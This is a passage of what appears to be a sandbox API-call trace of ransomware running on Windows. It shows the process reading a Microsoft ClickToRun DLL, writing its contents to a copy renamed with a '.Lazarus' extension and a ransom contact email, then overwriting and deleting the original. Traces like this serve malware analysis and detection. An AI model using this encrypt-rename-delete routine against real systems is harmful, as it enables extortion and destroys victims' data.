(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.229] AreFileApisANSI () returned 1 [0088.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 90 [0088.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0088.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.229] AreFileApisANSI () returned 1 [0088.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0088.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 90 [0088.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.230] GetFileType (hFile=0x360) returned 0x1 [0088.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.230] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0088.230] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0088.230] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0088.230] CloseHandle (hObject=0x360) returned 1 [0088.230] AreFileApisANSI () returned 1 [0088.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0088.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 90 [0088.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.231] GetFileType (hFile=0x360) returned 0x1 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.231] CloseHandle (hObject=0x360) returned 1 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0088.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0088.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0088.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.232] AreFileApisANSI () returned 1 [0088.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0088.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 90 [0088.233] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0088.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.233] AreFileApisANSI () returned 1 [0088.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0088.233] GetLastError () returned 0x0 [0088.233] SetLastError (dwErrCode=0x0) [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e308 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e440 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0088.233] GetLastError () returned 0x0 [0088.233] SetLastError (dwErrCode=0x0) [0088.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8aeb0 [0088.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x4ebc8 [0088.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0088.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0088.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.234] AreFileApisANSI () returned 1 [0088.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 152 [0088.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x130) returned 0x5e870 [0088.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=152 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 152 [0088.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.235] GetFileType (hFile=0x360) returned 0x1 [0088.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0088.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0088.235] AreFileApisANSI () returned 1 [0088.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0088.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 90 [0088.235] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.235] GetFileType (hFile=0x348) returned 0x1 [0088.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0088.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0088.236] GetLastError () returned 0x0 [0088.236] SetLastError (dwErrCode=0x0) [0088.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0088.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0088.236] GetLastError () returned 0x0 [0088.236] SetLastError (dwErrCode=0x0) [0088.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0088.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0088.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0088.236] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0088.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0088.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0088.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x48c98 [0088.238] GetLastError () returned 0x0 [0088.238] SetLastError (dwErrCode=0x0) [0088.238] GetLastError () returned 0x0 [0088.238] SetLastError (dwErrCode=0x0) [0088.238] GetLastError () returned 0x0 [0088.238] SetLastError (dwErrCode=0x0) [0088.238] GetLastError () returned 0x0 [0088.238] SetLastError (dwErrCode=0x0) [0088.238] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.385] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.386] GetLastError () returned 0x0 [0088.386] SetLastError (dwErrCode=0x0) [0088.386] GetLastError () returned 0x0 [0088.386] SetLastError (dwErrCode=0x0) [0088.386] GetLastError () returned 0x0 [0088.386] SetLastError (dwErrCode=0x0) [0088.386] GetLastError () returned 0x0 [0088.386] SetLastError (dwErrCode=0x0) [0088.386] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.386] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.387] GetLastError () returned 0x0 [0088.387] SetLastError (dwErrCode=0x0) [0088.387] GetLastError () returned 0x0 [0088.387] SetLastError (dwErrCode=0x0) [0088.387] GetLastError () returned 0x0 [0088.387] SetLastError (dwErrCode=0x0) [0088.387] GetLastError () returned 0x0 [0088.387] SetLastError (dwErrCode=0x0) [0088.387] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.387] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.388] GetLastError () returned 0x0 [0088.388] SetLastError (dwErrCode=0x0) [0088.388] GetLastError () returned 0x0 [0088.388] SetLastError (dwErrCode=0x0) [0088.388] GetLastError () returned 0x0 [0088.388] SetLastError (dwErrCode=0x0) [0088.388] GetLastError () returned 0x0 [0088.388] SetLastError (dwErrCode=0x0) [0088.388] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x8c0, lpOverlapped=0x0) returned 1 [0088.388] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.389] GetLastError () returned 0x0 [0088.389] SetLastError (dwErrCode=0x0) [0088.389] GetLastError () returned 0x0 [0088.389] SetLastError (dwErrCode=0x0) [0088.389] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0088.389] GetLastError () returned 0x0 [0088.389] SetLastError (dwErrCode=0x0) [0088.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0088.389] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327ef70*=0x8c0, lpOverlapped=0x0) returned 1 [0088.389] GetLastError () returned 0x0 [0088.389] SetLastError (dwErrCode=0x0) [0088.389] GetLastError () returned 0x0 [0088.389] SetLastError (dwErrCode=0x0) [0088.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0088.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0088.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0088.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x48c98 | out: hHeap=0x20000) returned 1 [0088.390] CloseHandle (hObject=0x360) returned 1 [0088.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0088.392] CloseHandle (hObject=0x348) returned 1 [0088.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0088.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0088.392] AreFileApisANSI () returned 1 [0088.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0088.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 90 [0088.393] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.394] GetFileType (hFile=0x348) returned 0x1 [0088.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0088.394] GetLastError () returned 0xb7 [0088.394] SetLastError (dwErrCode=0xb7) [0088.394] WriteFile (in: hFile=0x348, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0088.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0088.395] CloseHandle (hObject=0x348) returned 1 [0088.395] AreFileApisANSI () returned 1 [0088.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0088.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 90 [0088.395] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll")) returned 1 [0088.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 